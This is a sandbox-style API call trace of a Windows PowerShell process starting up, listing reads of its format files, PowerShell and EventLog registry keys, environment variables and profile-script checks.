File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type True 2
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096 True 6
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 281 True 1
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type True 2
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096 True 62
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895 True 1
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0 True 1
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_type True 2
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 4096 True 21
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 3687 True 1
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 409, size_out = 0 True 1
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type True 2
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096 True 4
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 2228 True 1
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 844, size_out = 0 True 1
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Create filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type True 2
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096 True 4
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 3736 True 1
Fn
Data
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 360, size_out = 0 True 1
Fn
File Read filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 0 True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Environment Get Environment String name = MshEnableTrace False 3
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Registry Enumerate Values reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Environment Get Environment String name = MshEnableTrace False 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Get Key Info reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\ODiag\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OSession\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Environment Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Environment Get Environment String name = HOMEPATH, result_out = \Users\kFT6uTQW True 1
Fn
File Get Info filename = C:\Users\kFT6uTQW, type = file_attributes True 1
Fn
File Get Info filename = C:\, type = file_attributes True 4
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
Environment Get Environment String name = MshEnableTrace False 2
Fn
Environment Get Environment String name = MshEnableTrace False 5
Fn
File Get Info filename = C:\Users\kFT6uTQW\Desktop, type = file_attributes True 2
Fn
Environment Get Environment String name = MshEnableTrace False 1
Fn
File Get Info filename = C:\, type = file_attributes True 2
Fn
File Get Info filename = C:\Users, type = file_attributes True 2
Fn
File Get Info filename = C:\Users\kFT6uTQW, type = file_attributes True 2
Fn
File Get Info filename = C:\Users\kFT6uTQW\Desktop, type = file_attributes True 2
Fn
File Get Info filename = C:\Users, type = file_attributes True 2
Fn
File Get Info filename = C:\Users\kFT6uTQW, type = file_attributes True 2
Fn
File Get Info filename = C:\Users\kFT6uTQW\Desktop, type = file_attributes True 3
Fn
Environment Get Environment String name = MshEnableTrace False 2
Fn
Environment Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Environment Get Environment String name = HomePath, result_out = \Users\kFT6uTQW True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Environment Get Environment String name = MshEnableTrace False 8
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\profile.ps1, type = file_attributes False 1
Fn
File Get Info filename = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\Documents\WindowsPowerShell\profile.ps1, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\kFT6uTQW\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1, type = file_attributes False 1
Fn
